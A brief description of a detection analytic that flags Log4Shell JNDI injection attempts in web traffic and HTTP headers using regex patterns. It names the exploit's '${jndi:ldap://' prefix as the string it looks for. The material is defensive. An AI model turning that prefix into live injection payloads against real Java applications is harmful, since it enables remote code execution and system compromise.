The detection rule targets attempts to execute Log4Shell JNDI payload injections through web traffic, specifically identifying patterns in raw web event data such as HTTP headers. The analytic analyzes the web datamodel leveraging regex patterns to spot strings associated with JNDI calls, notably those beginning with '${jndi:ldap://'. This rule is critical as it addresses a well-known vulnerability associated with Java-based applications that utilize the Log4j library, which could enable an attacker to run arbitrary code and completely compromise affected systems. Successful detections necessitate immediate investigation to assess if any breach has occurred and apply countermeasures.